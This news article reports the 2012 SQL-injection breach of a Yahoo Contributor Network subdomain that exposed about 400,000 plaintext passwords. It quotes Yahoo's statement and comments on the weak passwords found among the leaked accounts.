Apparently, a hacking collective known as D33Ds Company penetrated the Yahoo subdomain using what is known as a union-based SQL injection (oh, those SQL injection vulnerabilities). Managing to break in is bad enough, but worse still is the fact that the user accounts D33Ds uncovered were stored in plain text, not encrypted at all.
Yahoo's statement to the media (below) indicates that “approximately” 400,000 email addresses and passwords were leaked as plain text online, while D33Ds Company said it acquired the information from a total of 453,000 user accounts.
"At Yahoo we take security very seriously and invest heavily in protective measures to ensure the security of our users and their data across all our products. We confirm that an older file from Yahoo Contributor Network (previously Associated Content) containing approximately 400,000 Yahoo and other company users names and passwords was stolen yesterday,July 11. Of these, less than 5% of the Yahoo accounts had valid passwords. We are fixing the vulnerability that led to the disclosure of this data, changing the passwords of the affected Yahoo users and notifying the companies whose users accounts may have been compromised. We apologize to affected users. We encourage users to change their passwords on a regular basis and also familiarize themselves with our online safety tips at security.yahoo.com."
What's interesting is that many of the users seem to have fallen into the same hole that Internet users globally do: they choose passwords that end users have been told time and time again to avoid. For example, “123456″ was used as the password for 1,666 of the accounts, while “password” was used for 780 of them.
Examples of other easy passwords were common first names like Maggie and Michael (aside from using a name, it is recommended that users never select an actual word as their password, period), as well as variations on the number theme (e.g., 123123). The most common length of passwords was seven characters, which would be reasonably long if an end user included a combination of numbers, letters, and special characters.
With all these changes you might not remember if you had an account on the site. It's easy enough to check: Securi Labs has provided a tool that will check to see if your email address was among those leaked.
In terms of full disclosure, our email address was in the list, but the account and its password no longer worked after the multiple changes. The password, in fact, was unique among our passwords, as we use a tool to generate and track individual passwords for each site we use.